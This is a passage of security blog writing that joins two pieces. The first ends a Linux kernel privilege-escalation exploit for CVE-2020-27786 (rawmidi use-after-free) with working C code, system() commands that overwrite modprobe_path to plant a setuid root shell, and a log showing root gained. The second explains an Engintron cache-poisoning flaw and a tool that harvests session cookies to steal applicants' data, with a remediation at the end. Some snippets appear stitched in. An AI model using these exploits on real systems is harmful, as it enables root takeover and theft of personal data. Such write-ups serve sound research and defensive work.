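 * present) page before the copy touches the second (faulting) page.
 * Returns -1 if the prefix does not fit in one page. */
long fault_start_offset(size_t prefix_len)
{
    if (prefix_len > MODEL_PAGE_SIZE)
        return -1;
    return (long)(MODEL_PAGE_SIZE - prefix_len);
}

/* Number of bytes of a `total_len`-byte copy starting at `start_off` that
 * fall in the second page, i.e. that are copied only after the page fault
 * has been resolved. */
size_t bytes_after_boundary(size_t start_off, size_t total_len)
{
    size_t end = start_off + total_len;
    return end > MODEL_PAGE_SIZE ? end - MODEL_PAGE_SIZE : 0;
}
```

With prefix_len = 0x18 the buffer starts at offset 4072 of the first page, and of the 0x18 + 0x2 bytes written, only the last 2 are copied after the fault is released.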
Arbitrary Write
In order to write at arbitrary locations we use the same userfaultfd technique described above, but instead of targeting msg_msg we use the Vectored I/O (pipe + iovec) primitive. This primitive has been fixed in kernel 4.13 with the copyin and copyout wrappers, which add an access_ok check. This technique has been widely used to exploit the Android Binder CVE-2019-2215 and is well detailed here and here.
The idea is to trigger the UAF once again but targeting the iovec struct:
struct iovec
{
void __user *iov_base; /* BSD uses caddr_t (1003.1g requires void *) */
__kernel_size_t iov_len; /* Must be size_t (1003.1g) */
};
The minimum heap allocation for iovec occurs with sizeof(struct iovec) * 9, or 16 * 9 (144) bytes, which lands in kmalloc-192 (with 8 or fewer vectors the array is stored on the stack). However, I chose to allocate 13 vectors using readv to make the object land in kmalloc-256.
int pipefd[2];
pipe(pipefd);
// [...]
struct iovec iov_read_buffers[13] = {0};
char read_buffer0[0x100];
memset(read_buffer0, 0x52, 0x100);
iov_read_buffers[0].iov_base = read_buffer0;
iov_read_buffers[0].iov_len= 0x10;
iov_read_buffers[1].iov_base = read_buffer0;
iov_read_buffers[1].iov_len= 0x10;
iov_read_buffers[8].iov_base = read_buffer0;
iov_read_buffers[8].iov_len= 0x10;
iov_read_buffers[12].iov_base = read_buffer0;
iov_read_buffers[12].iov_len= 0x10;
if(!fork()){
ssize_t readv_res = readv(pipefd[0], iov_read_buffers, 13); // 13 * 16 = 208 => kmalloc-256
exit(0);
}
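The vector counts above follow from simple arithmetic: up to UIO_FASTIOV (8) entries the kernel keeps the iovec array on its stack, and only larger arrays are copied into a heap allocation of nr_segs * sizeof(struct iovec) bytes. A sketch of that rule, assuming a 64-bit kernel where struct iovec is 16 bytes; the names are hypothetical:

```c
#include <stddef.h>

#define MODEL_UIO_FASTIOV 8u    /* entries that fit in the on-stack array */
#define MODEL_IOVEC_SIZE  16u   /* sizeof(struct iovec) on 64-bit (assumed) */

/* Bytes the kernel would request from the heap to hold `nr_segs` iovec
 * entries, or 0 when the on-stack array is used instead. */
size_t iovec_heap_bytes(size_t nr_segs)
{
    if (nr_segs <= MODEL_UIO_FASTIOV)
        return 0;
    return nr_segs * MODEL_IOVEC_SIZE;
}
```

Nine vectors give 144 bytes (kmalloc-192) and thirteen give 208 bytes (kmalloc-256), matching the numbers used in the snippet above.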
readv is a blocking call that keeps the object allocated in the kernel (it is not freed while the call blocks), so that we can corrupt it using our UAF and have the kernel re-use it later with our modified content. If we corrupt the iov_base of an iovec structure we can write to arbitrary kernel addresses with a write syscall, since the copy uses the unsafe __copy_from_user (same as copy_from_user but without checks).

Our idea is:
- Resize runtime->buffer with SNDRV_RAWMIDI_IOCTL_PARAMS, using a size greater than 192, so that it lands in kmalloc-256
- write into the file descriptor specifying demand-zero paged memory (MAP_ANON) so that copy_from_user stops its execution waiting for our user-land page fault handler
- While the kernel thread is waiting, free the buffer by sending the re-size ioctl command SNDRV_RAWMIDI_IOCTL_PARAMS again
- Allocate the iovec struct using readv; it will replace the previously allocated runtime->buffer
- Resume kernel execution by releasing the page fault handler. Now copy_from_user starts writing into the iovec structure and we overwrite iov[1].iov_base with the modprobe_path address.
Now, in order to overwrite the modprobe_path value we just have to write our content into the write end of the pipe (pipefd[1]) using the write syscall, which unblocks the pending readv. In the released exploit I overwrote the second iov entry (iov[1]) using the same adjacent-pages technique described before. However, it’s also possible to directly overwrite the first entry, iov[0].iov_base.
Nice! Now we have overwritten modprobe_path with /tmp/x and... it’s time to pop a shell!
modprobe_path & uid=0
If you are not familiar with modprobe_path, I suggest you check out Exploiting timerfd_ctx Objects In The Linux Kernel and the man page.
To summarize, modprobe_path is a global variable with a default value of /sbin/modprobe, used by call_usermodehelper_exec to execute a user-space program when a file with an unknown header is executed.
Since we have overwritten modprobe_path with /tmp/x, when a file with an unknown header is executed, our controllable script is executed as root.
These are the exploit functions that prepare and later execute a suid shell:
void prep_exploit(){
system("echo '#!/bin/sh' > /tmp/x");
system("echo 'touch /tmp/pwneed' >> /tmp/x");
system("echo 'chown root: /tmp/suid' >> /tmp/x");
system("echo 'chmod 777 /tmp/suid' >> /tmp/x");
system("echo 'chmod u+s /tmp/suid' >> /tmp/x");
system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/nnn");
system("chmod +x /tmp/x");
system("chmod +x /tmp/nnn");
}
void get_root_shell(){
system("/tmp/nnn 2>/dev/null");
system("/tmp/suid 2>/dev/null");
}
int main(){
prep_exploit();
// [..] exploit stuff
get_root_shell(); // pop a root shell
}
What the exploit does is simply create the /tmp/x script, which will turn the file dropped in /tmp/suid into a root-owned setuid binary, and create a file with an unknown header (/tmp/nnn) that will trigger the execution of /tmp/x as root from call_usermodehelper_exec. After that, /tmp/suid gives root privileges and spawns a root shell.
POC:
/ $ uname -a
Linux (none) 4.9.223 #3 SMP Wed Jun 1 23:15:02 CEST 2022 x86_64 GNU/Linux
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /main
[*] Starting exploitation ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to 4096 ..
[*] snd_write triggered (should fault)
[*] Freeing buf using SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x5551000!
s -l[*] Replacing freed obj with msg_msg .
[*] Waiting for userfaultd to finish ..
[*] Page fault thread terminated
[+] Page fault lock released
[+] init_ipc_ns @0xffffffff81e8d560
[+] calculated modprobe_path @0xffffffff81e42a00
[+] Starting the arbitrary write phase ..
[*] Closing and reopening re-opening rawmidi fd ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to land into kmalloc-256 ..
[*] snd_write triggered (should fault)
[*] Freeing buf from SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x7771000!
[*] Waiting for readv ..
[*] Page fault thread terminated
[+] Page fault lock released
[*] Writing into the pipe ..
[*] write = 24
[+] enjoy your r00t shell [:
/ # id
uid=0(root) gid=0 groups=1000
/ #
Conclusion
I illustrated my experience of finding a public vulnerability using public resources to practise some Linux kernel exploitation. Once I had identified a good candidate, I developed the exploit for a 4.9 kernel, achieving arbitrary read and write. With these primitives, a root shell was spawned.
You can find the whole exploit here: https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit
References
- https://bugzilla.kernel.org/
- https://www.kernel.org/doc/html/v4.19/admin-guide/reporting-bugs.html
- https://lwn.net/Articles/749910/
- https://groups.google.com/g/syzkaller-bugs/
- https://cdn.kernel.org/pub/linux/kernel/
- https://elixir.bootlin.com/linux/v4.9.223/source/
- https://lwn.net/Articles/819834/
- https://www.youtube.com/watch?v=6dFmH_JEF4s
- https://blog.lizzie.io/using-userfaultfd.html
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
- https://syst3mfailure.io/wall-of-perdition
- https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html
- https://cloudfuzz.github.io/android-kernel-exploitation/chapters/exploitation.html#leaking-task-struct-pointer
- https://syst3mfailure.io/hotrod
- https://man7.org/linux/man-pages/man2/userfaultfd.2.html
- https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit
Dynamic caching: What could go wrong?
Tl;Dr
The Engintron plugin for CPanel presents a default configuration which could expose applications to account takeover and / or sensitive data exposure due to cache poisoning attacks.
Whenever a client sends a request to a web server, the back-end service processes it and generates the response from scratch each time.

With a high traffic volume, this behavior could overload the server, resulting in service performance issues. To solve this problem, reverse proxies implement mechanisms such as the web cache. When a user sends a request to a reverse proxy, the nginx core module will first check if a valid response is available in its caching storage. If no valid response is found, the original client request is forwarded to the web server, and the response is stored for future use before being sent back to the client.
When another user requests the same resource, the nginx core will serve the response stored in the cache instead of forwarding the request to the backend server, resulting in a much smoother browsing experience for the client.

Once the cache time has expired, the cached response is deleted. When another user requests the same resource, the flow starts again by getting a new response from the web server, storing it in the cache and so on.
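The miss, hit and expiry flow described above can be sketched as a single-slot cache with a time-to-live. This is a simplified illustration, not how nginx is implemented: the struct, the function names and the fake backend are all hypothetical, and time is passed in explicitly so the behaviour is easy to follow.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define KEY_MAX  128
#define BODY_MAX 256

/* One cache slot; a real proxy keeps many, indexed by the cache key. */
struct cache_entry {
    char key[KEY_MAX];
    char body[BODY_MAX];
    long stored_at;   /* time of storage, in seconds */
    int  valid;
};

/* Hypothetical backend: every call produces a fresh, distinct response. */
static int backend_calls = 0;
static void backend_fetch(const char *key, char *out, size_t out_len)
{
    snprintf(out, out_len, "response #%d for %s", ++backend_calls, key);
}

/*
 * Serve `key` at time `now` with a lifetime of `ttl` seconds.
 * Returns 1 on a cache HIT and 0 on a MISS (the backend was contacted).
 */
int cache_serve(struct cache_entry *e, const char *key, long now, long ttl,
                char *out, size_t out_len)
{
    assert(e != NULL && out_len > 0);

    if (e->valid && strcmp(e->key, key) == 0 && now - e->stored_at < ttl) {
        snprintf(out, out_len, "%s", e->body);   /* served from the cache */
        return 1;
    }

    /* Missing or expired: fetch again and overwrite the stored copy. */
    backend_fetch(key, e->body, sizeof(e->body));
    snprintf(e->key, sizeof(e->key), "%s", key);
    e->stored_at = now;
    e->valid = 1;
    snprintf(out, out_len, "%s", e->body);
    return 0;
}
```

Two calls with the same key inside the lifetime return the same body, whoever sent them. This is harmless for static pages and becomes a problem as soon as the stored response contains per-user data.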

Web-cache is also a complex mechanism which could easily be misconfigured, resulting in a wide variety of attack vectors.
Finding the bug
Engintron is an Nginx implementation for CPanel, which comes with some pre-enabled advanced functionalities, such as a micro-caching service for dynamic HTML content.


This caching service allows the storage of dynamic HTML responses in the cache for 1 second. To avoid caching responses containing sensitive information, Engintron skips the cache for requests that carry certain cookies or whose URLs start with some common prefixes.


The cache key is set to $MOBILE$scheme$host$request_uri, meaning that two users sending a request to the same URL could receive the same response.
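A short sketch makes the consequence of that key concrete. The struct and function below are hypothetical, the host name is a placeholder, and an empty $MOBILE value for desktop clients is an assumption; the only point is that nothing identifying the user takes part in the key.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Fields available on a request; only the first four feed the cache key. */
struct request {
    const char *mobile;        /* value of $MOBILE, assumed empty for desktop clients */
    const char *scheme;
    const char *host;
    const char *request_uri;
    const char *cookie;        /* carried by the request but NOT part of the key */
};

/*
 * Concatenate the fields in the same order as $MOBILE$scheme$host$request_uri.
 * Returns 0 on success, -1 if the key does not fit into `out`.
 */
int build_cache_key(const struct request *r, char *out, size_t out_len)
{
    assert(r != NULL && out != NULL);

    int n = snprintf(out, out_len, "%s%s%s%s",
                     r->mobile, r->scheme, r->host, r->request_uri);
    return (n >= 0 && (size_t)n < out_len) ? 0 : -1;
}
```

Two requests for the same URL, one from a victim and one from an attacker, produce byte-identical keys, so whichever response is stored first is the one both of them receive while it is still valid.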
Attack scenario
Scenario: A small web application used to send personal information for a candidacy, hosted by an Apache web server behind Nginx and running on a CPanel instance. The Nginx implementation is handled by the “Engintron” plugin.
Session handling is required, as the application allows users to resume the candidacy later on by using a password set during the initial submission.
The first step requires some basic personal information, an email address and a password.

The email and the password can be used to resume the candidacy later on.

When submitting this form, the backend writes the provided information into a temporary file, and the client gets redirected to the second step.

After the redirect to step2.php, some additional information is required before the final candidacy can be submitted.

When the form gets submitted the temporary file is deleted, and the session is discarded as not useful anymore.
The attack
The response that sets the session cookie does not send any cache-control directive, exposing the application to a form of web-cache poisoning attack that can lead to account takeover and sensitive data disclosure.
As mentioned at the beginning of this article, Engintron presents a micro-caching service which holds dynamic HTML resources in the reverse proxy cache for 1 second. Let’s analyze some responses:

A legitimate request carrying the “session-cookie” cookie results in the Engintron cache being ignored. To verify this, it is possible to send several requests in a short period of time, looking for discrepancies in the responses or for headers containing cache directives, such as “X-Nginx-Upstream-Cache-Status”. In this case, the cache-status header explicitly declares that the cache was bypassed.
Using the Burp Suite Intruder, we can send the request 100 times in a short period of time to verify it:

As expected, there is no difference in any of the responses.

This happens because the “session-cookie” cookie matches the Engintron regex, which prevents caching of private responses.
To get a cached response we have to provide a request which does not get validated by any of the Engintron cache bypass conditions.
This is possible simply by removing the Cookie header from the request.
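The decision described above can be modelled roughly as follows. This is a hedged sketch and not Engintron's actual logic: the real conditions are regular expressions in its Nginx configuration, while the lists below are hypothetical placeholders (only the “session-cookie” name comes from this scenario, and the "/admin" prefix is invented for illustration).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical patterns; the real lists live in the Engintron configuration. */
static const char *const bypass_cookie_names[] = { "session-cookie" };
static const char *const bypass_uri_prefixes[] = { "/admin" };

/* Return 1 if the request must skip the cache, 0 if it may be served from it. */
int should_bypass_cache(const char *cookie_header, const char *uri)
{
    assert(uri != NULL);

    size_t n_prefixes = sizeof(bypass_uri_prefixes) / sizeof(bypass_uri_prefixes[0]);
    for (size_t i = 0; i < n_prefixes; i++) {
        const char *p = bypass_uri_prefixes[i];
        if (strncmp(uri, p, strlen(p)) == 0)
            return 1;
    }

    /* A request without a Cookie header can never match a cookie rule. */
    if (cookie_header != NULL) {
        size_t n_names = sizeof(bypass_cookie_names) / sizeof(bypass_cookie_names[0]);
        for (size_t i = 0; i < n_names; i++) {
            if (strstr(cookie_header, bypass_cookie_names[i]) != NULL)
                return 1;
        }
    }
    return 0;
}
```

The check only looks at what the request carries, not at what the response will set. A request without cookies is therefore cacheable even when the backend answers it with a fresh Set-Cookie header.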

The cached response contained a really interesting header: “Set-Cookie”. This header is setting the session-cookie value for the current user, identifying a session.
By sending the request twice in the same second, we would get the same set-cookie header.
To verify this, we can wrap a curl command in a while loop and observe that multiple responses are carrying the same value.

Because of this, an attacker could automate the process of retrieving valid session cookies from the cache and try to use them to retrieve a user's sensitive information before the victim submits the final form.
To perform this attack I’ve built a small tool written in Go.
Please excuse my code-writing skills; I will try to explain the relevant parts of the exploit code.
The exploit starts a thread which collects a new cookie every second, storing it in a JSON file:

The cookie struct holds the cookie value, how many times it has been used by the script (Count), and whether it has been used to retrieve sensitive information (Consumed).

The JSON file looks like this:

While the first thread collects cookies, a second thread is spawned to collect any new sensitive data associated with the stolen sessions.

When the “mydata.php” page content length is greater than 933, it means that some data has been stored, and in that case a copy of the response is saved.
The following video shows a proof of concept of the exploit.
This kind of application logic is common in many scenarios such as job candidacies. The impact of this issue highly depends on the kind of data processed by the application.
Another thing to note is that detecting attacks like this would be really difficult, as the generated traffic would look legit.
Remediation
As a workaround for this issue, it is recommended to disable the dynamic cache service in Engintron. To do this, comment out line 53 in the configuration file located at /etc/nginx/common_http.conf.
